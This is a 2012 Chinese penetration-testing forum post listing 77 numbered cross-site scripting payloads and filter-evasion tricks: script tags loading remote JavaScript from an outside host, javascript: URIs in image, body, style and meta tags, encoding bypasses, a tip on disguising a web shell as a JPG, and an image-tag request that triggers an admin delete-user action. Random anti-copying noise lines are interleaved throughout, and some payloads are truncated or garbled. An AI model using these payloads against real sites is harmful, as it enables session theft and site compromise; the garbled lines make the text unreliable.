中国网络渗透测试联盟
标题:
xss详细利用大全1
[打印本页]
作者:
admin
时间:
2012-9-13 17:04
标题:
xss详细利用大全1
跨站图片shell
5 D7 V3 B9 V) O% P
XSS跨站代码 <script>alert("")</script>
- N9 H5 s5 K' C+ x5 s. ^, a
8 Z, W+ r* k9 j* k3 N) E
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
/ U) M* Y e$ @9 I$ y6 y' c/ A
2 y# L$ b/ U9 T! J: q7 v) E& G
9 X) a H0 J7 ?; u: ? [
+ }) d7 t6 U$ C2 z- D" d
1)普通的XSS JavaScript注入
1 ~; W' G5 m& R( b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 W3 O& Q9 [' {- C
/ P. g) B: [, c3 }8 z
(2)IMG标签XSS使用JavaScript命令
- e, v; w* w; T; m
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 z2 f/ V- ?: l6 ?- {: k
! i: q) }4 S5 W3 t! k4 I& B$ X
(3)IMG标签无分号无引号
5 Q6 H* ]5 |3 X& a
<IMG SRC=javascript:alert(‘XSS’)>
) n! ~3 l( \* o) a5 Y6 M: }% S5 u
- F- L/ T% M0 ~, S* X+ U' u9 {
(4)IMG标签大小写不敏感
2 J5 F' G4 r, S& n9 O: e( v
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 ?. n# X2 `3 x, W' f
/ J! j3 M1 H4 r: k- J' m
(5)HTML编码(必须有分号)
& ~) W5 j) V/ Y8 n1 C3 y
<IMG SRC=javascript:alert(“XSS”)>
2 P2 D7 D4 `! C6 w: b1 W
5 Q6 n9 w# ?8 X, [# o- U8 u
(6)修正缺陷IMG标签
8 n; Q" M& w2 Y6 \& g
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
% m9 F' E: D' y! P
; R0 Y! V2 g8 t( J* E0 y$ H
(7)formCharCode标签(计算器)
# `. X3 ?% t6 C; v$ g9 y8 `
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
3 b: n; ]( D* ?! ^. j- f" ~
! W- p/ ?1 T' N( ]) Y0 B
(8)UTF-8的Unicode编码(计算器)
+ ]. o5 R& M$ A6 ^0 D
<IMG SRC=jav..省略..S')>
8 d" r8 R3 U" }/ k2 a5 i V
$ n. _1 c1 B: Q2 a: ^0 y
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
+ J! M' e" w& p# H# n
<IMG SRC=jav..省略..S')>
6 X: G) R" g# f) z4 L3 L# ]! |( F
7 O5 c8 T7 ?9 z$ M% J
(10)十六进制编码也是没有分号(计算器)
$ ~, | w( ^" s% s; T5 O$ U5 p
<IMG SRC=java..省略..XSS')>
' j* h T; ^" m" X% g7 {) ~
5 Y1 y. [- A) }" J- A* ?7 M
(11)嵌入式标签,将Javascript分开
+ U, _6 S8 R! J) J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# O1 s; H" B& J& `- V! z7 \
" u0 z" J- v. S
(12)嵌入式编码标签,将Javascript分开
D5 M' t4 E4 H' T5 a
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- P1 o8 g1 t/ o7 d
2 q% |! [. r/ ^2 t2 J) M5 l- p
(13)嵌入式换行符
/ V! w) S4 |6 s* H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 ?$ J' j% j3 j9 x; ^
, [. p8 H% E2 d" @2 M, O
(14)嵌入式回车
: [8 A& m1 [$ K r1 {& q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: J/ Q! F( Z1 m& Q* p0 k" V7 w8 i( ?
. Z% `# b. `$ @' g! u
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
" h4 N1 p+ _7 z! ^* X
<IMG SRC=”javascript:alert(‘XSS‘)”>
& N4 l# ^( _/ X8 z, L
* {! C7 f* h* l0 I
(16)解决限制字符(要求同页面)
( l& a+ r5 \% @, Z; |# \' l
<script>z=’document.’</script>
6 q, U3 F0 Q3 g
<script>z=z+’write(“‘</script>
3 R8 ?5 s, G# e3 }9 U% _# a
<script>z=z+’<script’</script>
$ z. x( q- z/ x0 J1 l
<script>z=z+’ src=ht’</script>
& o h& U6 T2 Y
<script>z=z+’tp://ww’</script>
4 w- P5 Y- s3 y1 n; S8 S
<script>z=z+’w.shell’</script>
, S+ |9 H) ?/ G* B6 j
<script>z=z+’.net/1.’</script>
9 x8 W. U. q+ Z6 b
<script>z=z+’js></sc’</script>
. u; J' l! n2 U9 N* O+ d
<script>z=z+’ript>”)’</script>
M1 M0 E% T- Z% Z) Y5 s. i" e3 D
<script>eval_r(z)</script>
/ |3 c" H" r) X1 p6 n
! r9 H) M% v1 P
(17)空字符
/ a3 i L: i, L2 U+ _9 u6 l9 a( X
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
: X! |. C" k" T, G( |
* F7 j3 v! d7 q" E
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
9 n( s7 t# Q1 c% ~* x
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
; U7 o; z% [( W6 y2 F
k4 z, q& W: O& ^( P. S$ {
(19)Spaces和meta前的IMG标签
! x+ e2 {$ \5 @2 X
<IMG SRC=” javascript:alert(‘XSS’);”>
' {' |/ C0 h+ V; H" x T
) b U' i& D2 u: G
(20)Non-alpha-non-digit XSS
: U& y0 x6 S$ t! p
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
3 |" ]- v2 v* I2 p0 g$ j4 k/ q
7 c9 m* r5 ?0 W9 h: Z. E* c1 D
(21)Non-alpha-non-digit XSS to 2
) f7 h% H2 o2 H& `$ S2 ^ [
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- N+ ~$ t/ p0 A R: ]% k1 X* z( v
) v; j) \4 A4 z( j1 K
(22)Non-alpha-non-digit XSS to 3
. O7 D5 G. f9 E7 y5 J
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
8 b8 _' N# G D: }4 w
" j s& w" y# B( t/ g
(23)双开括号
& y2 J n* K* W" A" r% C1 u
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
3 [/ X9 H# z1 S+ W2 l/ D' r, K7 _7 _
* q9 d7 O1 R0 k. _) Y2 i
(24)无结束脚本标记(仅火狐等浏览器)
- H2 L3 R, H5 H- o, K+ }- ]4 r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
/ h q8 Z: M# K0 b
. V5 T i, }, S; ?# q j) I/ L6 I
(25)无结束脚本标记2
) l, w0 z5 E) f
<SCRIPT SRC=//3w.org/XSS/xss.js>
* w" r; I8 t/ w" p) X: i. W2 @8 y) S
- c! h' C! X$ a8 |; r, Z. B# \
(26)半开的HTML/JavaScript XSS
0 t$ H9 d" K1 D" F0 d$ R2 z- Y! p( v
<IMG SRC=”javascript:alert(‘XSS’)”
* l- w) ^ `$ [, k- m" y4 @% m6 T
$ H7 }2 U- l* X* K6 }8 b
(27)双开角括号
6 o1 @7 o) V! X0 ~4 ]* d
<iframe src=http://3w.org/XSS.html <
/ [! n# w- E$ ^* s
& [. ]) X( z, B/ `( P
(28)无单引号 双引号 分号
$ w6 ?: @* [. i6 D6 H
<SCRIPT>a=/XSS/
! N8 Q! J. Z' @- ]
alert(a.source)</SCRIPT>
3 z' G* V! B) ~: ?7 \+ H6 G8 ]5 h
+ C! y- q3 e7 k7 D% ]; c% d2 M% }
(29)换码过滤的JavaScript
7 O8 l- f6 j2 u9 n# |: }; r
\”;alert(‘XSS’);//
% m/ w: }) d S3 n1 V4 |4 C$ |
7 n4 M e0 \# h/ q& k
(30)结束Title标签
4 f8 U2 s- v6 V3 I* u
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 r, c) E# `7 D
: g0 W2 u! a# u9 L! ~& J# F
(31)Input Image
) {5 r! [( Z/ I0 s! i' o' Q
<INPUT SRC=”javascript:alert(‘XSS’);”>
# c# j, {6 e6 |; W3 g9 Y% S3 R
8 w. @) x( \2 D8 b8 g- l8 J# u6 Y, W8 c
(32)BODY Image
7 C, a3 Q& O9 z' A1 G/ ?
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ q( }, G/ U* I9 Q. P
& Z( G+ d/ o6 E1 w) x) u: V+ o
(33)BODY标签
/ o+ B4 D4 q x9 N6 F8 l" p
<BODY(‘XSS’)>
* n# {. Q2 B3 H1 I, T* l X! P
5 z/ b5 A% `' A C! n0 R& ~2 s( ?
(34)IMG Dynsrc
g- a8 p6 j% G& r" q3 S2 [( C- G
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
: r1 i- u3 \5 B6 U: q
0 @ V3 }0 f. n* N6 o2 P( f7 ~" t
(35)IMG Lowsrc
7 n5 a, \9 ]0 i9 }! |0 z. y
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
; ?8 o2 a5 G+ W, U+ s
3 @3 W2 f) n% w+ j
(36)BGSOUND
( K/ H H- l1 }" c
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
* \& z9 p/ r2 y) A1 ~
8 c8 C1 r# m/ M5 F. H
(37)STYLE sheet
/ \7 K) p4 T$ m( i
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 u& G& K3 m; `. u9 Y
4 r9 M. j, K n$ }7 y/ O* s: }- w
(38)远程样式表
% g6 s3 U0 V0 G# y3 ~) _- L
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
, e: j0 F0 o' u6 e* t8 t
. S; _% B/ I' X+ T0 x+ W
(39)List-style-image(列表式)
& M. M$ `0 q. ?& x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
5 |0 N9 q' o' g$ |' a! q: j
( B6 A4 _) e( C8 i' O7 Z4 C* R
(40)IMG VBscript
; n$ A$ M, u( U# s, M" v. B8 D
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 R% V# |' S7 A! [& Y
& ^* i3 ^' a/ d# H" k1 F* ?
(41)META链接url
7 ?# m* D ~ A( ^+ n
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
4 r5 L( b6 ~. C) h$ \! m
! \' ~/ i' D' K3 u& h5 m
(42)Iframe
7 D* }) \8 l5 F; Y
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
. ^$ ?; j6 @6 M+ p& }8 |% S8 m% I
(43)Frame
+ q9 y. s! Y& u1 k7 h, K
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
# |' J' ?, M! b. \$ G, w
9 g' P, z9 P6 m' G. j) y& C, ~# d
(44)Table
7 e- k7 Z: B+ T& u5 n+ C
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' j" |5 H. v# {, K' `- J' i
9 V6 y2 y. @- a/ i" c7 P6 W5 D
(45)TD
$ d& ^; @/ F. E" K
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
( `9 Y& ~. t( w
6 x/ C4 M( i, [% z, ^+ j
(46)DIV background-image
0 X+ u/ |9 d3 m6 H- l/ r7 n/ S
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 T6 `7 Z; E6 F, }$ u* l5 ]
% F) L B' ~2 }9 {" ]% F
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
! L. c0 {# a4 h% F
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
, F& d8 F' [! ?
4 l3 ~3 U [, T7 l9 V6 `7 }
(48)DIV expression
, j; E \7 q( g, [- k8 B; f; d: m
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
7 g0 c9 w" X% S" }$ _# V4 h/ {% g& N
6 v: U& i( X% e
(49)STYLE属性分拆表达
& M9 `3 l8 l( R4 G5 a
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
* l2 a! e- a, [% S/ O$ e- F1 E
6 K2 y( s8 s6 X% m* K* {! T+ Y9 y) T
(50)匿名STYLE(组成:开角号和一个字母开头)
; Z. U( r6 N& C; T4 d7 V
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: V6 L- s6 x5 f4 c* d( d" I
9 m r* _% E% ?: |# M2 \
(51)STYLE background-image
% O: `" `# C! n! W) k
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
( W* s0 F( v; b: p
- y2 s6 S4 e" \/ [5 W- C! @
(52)IMG STYLE方式
4 n3 _$ J6 O$ P. o6 `1 L
exppression(alert(“XSS”))’>
P; |. T) s. k2 E# u6 f
( B4 _2 P x) Q1 ?
(53)STYLE background
% u8 m" g# V. z
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 c y' ^5 E* O# Q
& i/ E9 ~7 e8 s. s8 t: p8 g
(54)BASE
+ P+ z/ X$ @ o; E! ]1 [
<BASE HREF=”javascript:alert(‘XSS’);//”>
" v4 s/ U3 P# X2 d! ~% H
5 h5 F7 H8 h, j5 I% C3 P. P
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) P2 H) ~7 Q% `) Z
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
, S2 e, p4 h5 [6 ~7 T
! Z8 X5 R" Q) O$ J3 q( \$ b
(56)在flash中使用ActionScrpt可以混进你XSS的代码
' i+ [) O, }/ r$ ~
a=”get”;
. ^1 N8 G A- V C
b=”URL(\”";
5 l6 X1 f/ \8 x& R1 R" N8 R
c=”javascript:”;
! F: \& s4 A( ]7 i" h
d=”alert(‘XSS’);\”)”;
' V" ^* ]: q& O& I2 v: Y7 N
eval_r(a+b+c+d);
" L e; O! U2 I7 U" ]' f
2 E& l" T& [3 k2 D$ W2 d
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
6 z" d" y* A6 G2 x) z/ r. u' f g; p' m
<HTML xmlns:xss>
" b v. d* P$ y1 }2 [
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
" N9 f# i% S" Q, u, t
<xss:xss>XSS</xss:xss>
# V. Z ]$ ?9 u- r
</HTML>
2 y# b) [. v4 }% H; J$ r' }
% p: D* b: k/ H# z9 [
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
0 X1 [; V; [, C) c, Y2 T% q3 w
<SCRIPT SRC=””></SCRIPT>
6 c+ @8 e: S7 U- `
+ [) m7 M& r, N, c& P u! I
(59)IMG嵌入式命令,可执行任意命令
) o+ B: Z2 t( e- v! }6 K
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
T4 h6 o- z$ M5 ~
4 t9 a3 w) _: \+ s2 t+ o5 v
(60)IMG嵌入式命令(a.jpg在同服务器)
% G, d. E0 P) L" Y1 }5 z; ]
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
5 q" X1 [7 a1 X$ C
6 G1 r) f m1 h) m( x
(61)绕符号过滤
3 ~) z: \0 _' P
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
; L0 {0 u& g" C5 ` _3 y3 W
/ I9 f/ S7 J& u, G
(62)
! R' r/ [% }/ o' W' f7 n
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
0 K1 u: ^9 b+ q; \2 n) Z- M) o- f
: V& n1 h% i4 S( C+ V2 R9 ^
(63)
4 r; O7 @" b# t6 T- b$ A; Q
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
* P4 Q+ S( |# W# e
5 v$ h" @3 l: V* V& b4 Z
(64)
, G. S! _- G9 ?0 e- F3 H! V4 c
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
8 \1 ]! X* ~& v
; v H5 J6 p& u. d/ c1 p; @
(65)
5 w8 S1 r) i2 q6 ^
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
9 H! o' `5 A# R* U
' d) w3 Q. D) |4 w
(66)
; z4 f/ F1 R' W# Y6 X
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
. ?+ i6 x& V6 ?4 R( F7 D$ C
' R6 O0 j( l- j
(67)
- Y6 c" x: Y0 w: a4 W- ]
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”></SCRIPT>
B- P+ a" j: v, W" U2 a3 s
/ Q- r3 d3 m$ m5 s+ I j
(68)URL绕行
3 f o8 j9 a0 z' t( u9 J0 W. W+ i: X
<A HREF=”
http://127.0.0.1/
”>XSS</A>
% u- O! |; ^7 f6 d- D7 h) g; g
- q7 Q7 f, N6 U* D; G! U
(69)URL编码
. J- i: z& C: D$ U
<A HREF=”
http://3w.org
”>XSS</A>
" C! r) B [! p: `5 {
$ t) r" x, Z6 Q
(70)IP十进制
3 L- S8 }, d$ K1 a+ ~( E
<A HREF=”http://3232235521″>XSS</A>
7 ~" h; N+ T" @0 t7 i" |, p
1 ?" W" h% d2 f' I6 U
(71)IP十六进制
c% o3 O# c7 h1 `0 i5 K- ^+ K
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
2 n* x, K b; \; {" m/ k
, K) g7 m* u4 x' L
(72)IP八进制
0 A5 x- H$ f9 ^1 X4 y# w7 q
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
# K) ]! ]& _5 \7 K: q. S1 N, y
' \' x2 B3 _' t) Q
(73)混合编码
- J( N6 ~2 A" p0 b
<A HREF=”h
d9 i* O v- ^7 }7 t' v
tt p://6 6.000146.0×7.147/”">XSS</A>
5 L0 f& ]9 J2 c7 b5 K$ t, f
4 m& P2 l' V: `7 M2 o
(74)节省[http:]
% _* [* u5 F8 E: P1 l1 ~& x, ~
<A HREF=”//www.google.com/”>XSS</A>
C) W0 J" u: g# u
* h3 w2 ^; {3 s5 L3 z
(75)节省[www]
9 x A @# M. r) w- @; ]
<A HREF=”
http://google.com/
”>XSS</A>
0 s' m2 X }1 x: t4 G$ h- N
# o \7 @: s) q
(76)绝对点绝对DNS
7 ~" Y& T( t/ m" c( n: i0 p/ V/ t
<A HREF=”
http://www.google.com./
”>XSS</A>
$ o8 \' h+ m' J3 ^; F+ w, p
$ K/ e: b1 h* g+ w! u0 T/ E6 G
(77)javascript链接
- P% Q% n6 \" M& a6 Z# X
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
. W. c0 D% Z1 J( S5 p
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2